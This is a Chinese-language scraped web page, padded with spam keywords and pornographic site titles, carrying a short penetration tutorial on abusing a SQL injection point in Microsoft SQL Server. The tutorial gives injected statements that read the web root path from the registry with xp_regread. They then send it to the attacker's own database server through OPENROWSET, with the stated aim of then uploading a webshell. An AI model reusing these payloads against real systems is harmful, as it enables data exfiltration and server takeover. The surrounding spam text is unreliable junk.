婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 滲透中用openrowset搞shell的方法

滲透中用openrowset搞shell的方法
熱門標簽:臨滄移動外呼系統哪家有 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 防城港市ai電銷機器人 怎么更改地圖標注電話 交行外呼系統有哪些 激戰黃昏地圖標注說明 不同的地圖標注 隨州銷售外呼系統平臺
滲透中用openrowset搞shell的方法 
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數據庫 

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ 

標簽:紅河 阜陽 哈密 忻州 無錫 青海 河源 沈陽

巨人網絡通訊聲明:本文標題《滲透中用openrowset搞shell的方法》,本文關鍵詞  滲透,中用,openrowset,搞,shell,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《滲透中用openrowset搞shell的方法》相關的同類信息!
  • 本頁收集關于滲透中用openrowset搞shell的方法的相關信息資訊供網民參考!
    • 推薦文章
    主站蜘蛛池模板: 丹江口市| 盘锦市| 保德县| 许昌县| 隆德县| 宝清县| 黄浦区| 醴陵市| 商南县| 海丰县| 靖边县| 壤塘县| 石泉县| 绥德县| 汉源县| 北流市| 化州市| 新绛县| 疏附县| 湄潭县| 汕尾市| 苍溪县| 宜良县| 淮滨县| 卓尼县| 历史| 鸡东县| 邹城市| 新兴县| 沅陵县| 贺州市| 炎陵县| 金华市| 礼泉县| 东莞市| 竹北市| 黑河市| 偃师市| 襄城县| 新兴县| 江永县|